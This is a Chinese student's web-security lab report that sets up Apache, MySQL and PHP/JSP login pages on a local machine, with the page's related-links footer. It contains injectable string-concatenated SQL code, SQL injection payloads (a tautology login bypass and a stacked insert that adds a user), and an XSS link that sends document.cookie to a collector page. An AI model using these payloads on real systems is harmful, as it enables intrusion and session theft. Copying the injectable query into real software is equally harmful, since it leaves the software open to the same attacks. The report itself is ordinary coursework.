• 20145313张雪纯Exp8 Web基础


    回答问题

    (1)什么是表单
    表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处理脚本的处理工作。

    (2)浏览器可以解析运行什么语言。
    html,css,javascript,如果想运行其他语言,需要安装插件。

    (3)WebServer支持哪些动态语言
    python、nodejs、php、ruby等。

    2.实验总结与体会
    这个实验太难了,Java学得不好,web一般,php没学过,为什么我要选它??思考人生...........

    实验步骤

    Web前端HTML

    • 使用apachectl start开启Apach,使用netstat -aptn查看端口占用.由于OPEN VAS使用80端口,把配置端口文件中把默认监听端口改成8088。

    • 重启Apache服务

    • 打开127.0.0.1:8088,测试服务是否已成功启动.打开显示为上次实验生成的钓鱼网站

    • /var/www/html文件夹下生成一个测试文件,测试网页是否能调取文件夹中的文件

    • 编写一个简单的登录界面网页。

    • 输入用户名密数据传输至action中的5313.php中,但是由于未定义无法显示

    • 测试php功能

    Web前端javascipt

    • 验证用户名、密码
        String sql="select * from users where username="+"'"+username+"'";//定义一个查询语句
        ResultSet rs=db.executeQuery(sql);//运行上面的语句
        if(rs.next())
        {
           
            if(password.equals(rs.getObject("password"))){
                response.sendRedirect("loginsuccess.jsp");       //如果密码匹配则跳转至loginsuccess.jsp
            }
            else{
                out.print("<script language='javaScript'> alert('密码错误');</script>");
                response.setHeader("refresh", "0;url=login.jsp");
            }
        }
        else 
        {
            out.print("<script language='javaScript'> alert('请输入用户名——else');</script>");
            response.setHeader("refresh", "0;url=login.jsp");
        }
    
    

    Web后端

    • /etc/init.d/mysql start启动MySQL

    • mysql -u root –p登录MySQL,默认密码为p@ssw0rd

    • show databases;查看基本信息,显示出有多少数据库。

    • 建库建表

    CREATE SCHEMA `库表的名称`;
    CREATE TABLE `库表的名称`.`users` (
     `userid` INT NOT NULL COMMENT '',
     `username` VARCHAR(45) NULL COMMENT '',
     `password` VARCHAR(256) NULL COMMENT '',
     `enabled` VARCHAR(5) NULL COMMENT '',
     PRIMARY KEY (`userid`) COMMENT '');
    

    • 添加数据记录
    use ‘库表名称’
    insert into users(userid,username,password,enabled) values(1,'用户id',password("用户密码"),"TRUE");
    

    • 查看用户,修改密码,更新权限

      • 输入use mysql;,选择mysql数据库
      • 输入select user, password, host from user;,mysql库中的user表中存储着用户名、密码与权限
      • 输入UPDATE user SET password=PASSWORD("新密码") WHERE user='root';
      • 输入flush privileges;,更新权限
      • 输入quit退出
    • 编写登录界面login.html

    • 编写连接数据库login.php

    • 用添加的数据记录进行登录

    • 5秒后转至欢迎界面

    SQL注入,XSS攻击测试

    SQL攻击

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

    永真式攻击

    在用户名输入框中输入' or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为
    select * from users where username='' or 1=1#' and password=md5('')
    由于以“ #”号开头直到行尾的所有内容都认为是注释,所以以上语句等价为
    select * from users where username='' or 1=1
    再等价为
    1=1
    为永真式,永远成立。

    SQL注入

    • 先构造sql注入语句,在数据库中添加数据。
      ';insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");#
      同上,等价于
      SELECT * FROM users WHERE username='';
      insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");

    • 连接成功,完成注入

    • 使用注入的数据进行登录

    XSS攻击

    XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。

    • 先建立一个网站test5313.html, 用来接收“偷”来的信息。然后构造一个恶意链接,诱使用户点击。如http://127.0.0.1:8088/logIn.php?term=<script>window.open("http://127.0.0.1:8088/test5313.php?cookie="+document.cookie)</script>.
    • 用户点击了这个URL,嵌入在URL中的恶意Javascript代码就会在用户的浏览器中执行. 其在127.0.0.1:8088/logIn.php网站的cookie, 就会被发送到127.0.0.1:8088/test5313.html网站中。即可实现对用户身份的盗取。
    • 点击构造的url,自动转至原网页

      用XSS实现在输入特定字符串后显示图片:

    使用cookie进行登录

    • cookie指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。

    • 相关代码ltc已上传至git:http://git.oschina.net/alovera/webhuihuaguanli/tree/master

    • 在网站默认目录下建立logIn.php,logOut.php,loged.php

    • 首先在logIn中登录,关闭网页后再次打开不需要再次登录。想退出时点击log out即可。

    实现发帖功能

    • 使用data.txt的写入读取实现发帖、查看已发布帖子。

  • 相关阅读:
    2019年春季第四周作业
    第三周作业
    第二周作业
    最大值及其下标
    查找整数
    PTA3
    币值转换
    三位老师
    自我介绍
    poj 3278 Catch That Cow(bfs)
  • 原文地址:https://www.cnblogs.com/entropy/p/6792440.html
Copyright © 2020-2023  润新知